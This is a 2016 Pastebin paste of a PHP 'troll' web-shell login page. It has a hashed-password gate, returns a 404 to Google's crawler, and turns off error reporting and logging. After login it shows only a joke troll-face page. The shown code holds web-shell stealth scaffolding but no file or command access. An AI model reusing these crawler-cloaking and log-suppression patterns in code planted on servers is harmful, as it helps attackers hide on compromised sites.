Advertisement
ustadcage_48

Troll Shell Login

May 18th, 2016
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.64 KB | None | 0 0
  1. <?php
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. $auth_pass="3af3b3221714103a593acc24ae213767";
  5.  
  6. $color = "#FFFF00";
  7. $default_action = 'FilesMan';
  8. @define('SELF_PATH', __FILE__);
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10. header('HTTP/1.0 404 Not Found');
  11. exit;
  12. }
  13. @session_start();
  14. @error_reporting(0);
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('html_errors',0);
  18. @ini_set('max_execution_time',0);
  19. @ini_set('output_buffering',0);
  20. @ini_set('display_errors', 0);
  21. @ini_set('file_uploads',1);
  22. @set_time_limit(0);
  23. @set_magic_quotes_runtime(0);
  24. @clearstatcache();
  25. @define('VERSION', '2.1');
  26. if( get_magic_quotes_gpc() ) {
  27. function stripslashes_array($array) {
  28. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  29. }
  30. $_POST = stripslashes_array($_POST);
  31. }
  32. function printLogin() {
  33. ?>
  34.  
  35.  
  36. <!DOCTYPE html>
  37. <html>
  38. <head>
  39. <title>0x1996 - UstadCage_48 Uploader</title>
  40. <meta name="robots" content="noindex, nofollow, noarchive">
  41. <link rel="SHORTCUT ICON" href="http://north-american.yeoldeinn.com/images/quest-design/drathe-giant-spider.gif">
  42. <link href="http://fonts.googleapis.com/css?family=Atomic+Age" rel="stylesheet" type="text/css"> <style type="text/css">
  43.  
  44. body{ background:#000000; font-size:11px; font-family:Atomic Age; color:#fff; }
  45.  
  46. #main{ background:#111111; padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px; width:100%; font-family:Atomic Age; }
  47.  
  48. .gaya { color:#4C83AF; font-weight:bold; }
  49.  
  50. .inputz { background:#111111; border:0; padding:2px; border-bottom:1px solid #393939; font-size:11px; color:#ffffff; font-family:Atomic Age; }
  51.  
  52. .inputzbut{ font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222; font-family:Atomic Age; }
  53. .footer{ text-align:right; padding:0 16px; font-size:10px; letter-spacing:2px; color:white; }
  54. </style>
  55. </head>
  56. <body>
  57. <table id="main">
  58. <tr>
  59. <td>   
  60. <div style="width:100%;text-align:center;">    
  61. <form action="" method="post">  
  62. <img src="http://north-american.yeoldeinn.com/images/quest-design/drathe-giant-spider.gif" style="margin:2px;vertical-align:middle;" width="12px" height="12px" />  0x1996&nbsp;
  63. <span class="gaya">v1.0</span>
  64. <input class="inputz" type="password" name="pass" style="width:120px;" value="" />  <input class="inputzbut" type="submit" value="LoGin !" name="submitlogin" style="width:80px;" />    
  65. </form>    
  66. </div>
  67. </td>
  68. </tr>
  69. </table>
  70. <p class="footer">BebyYers Indonesia &copy;2016 0x1996 [ UstadCage_48 ]
  71. </p>
  72. </body>
  73. </html>
  74.  
  75.  
  76.  
  77.     <?php
  78.    exit;
  79. }
  80. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  81.     if( empty( $auth_pass ) ||
  82.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  83.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  84.     else
  85.         printLogin();
  86.       if(isset($_GET['log']) && ($_GET['log'] == 'out'))
  87. {  
  88. ?>
  89. <?php
  90.  unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  91.    
  92. }  
  93.        
  94.         ?>
  95.        
  96.         <link href="http://fonts.googleapis.com/css?family=Atomic+Age" rel="stylesheet" type="text/css"> <style type="text/css">
  97.  
  98. body{ background:#fff; font-size:11px; font-family:Atomic Age; color:#black; }
  99. a{color:red}
  100. </style>
  101.        
  102.         <center>
  103.         <font size="7">
  104.         Troll Success Mz
  105.         <br>
  106.         <img src="http://vignette1.wikia.nocookie.net/t-r-o-t-c/images/0/0c/Mexican_troll_face_by_mariodude12312-d5mtl9z.png/revision/latest?cb=20140912213621"/>
  107.         <br>
  108.        Selamat anda masuk TV mz<br>
  109.        Silahkan logout kembali<br>
  110.        <a href="?log=out">.LogOut</a>
  111.         </font>
  112.         </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement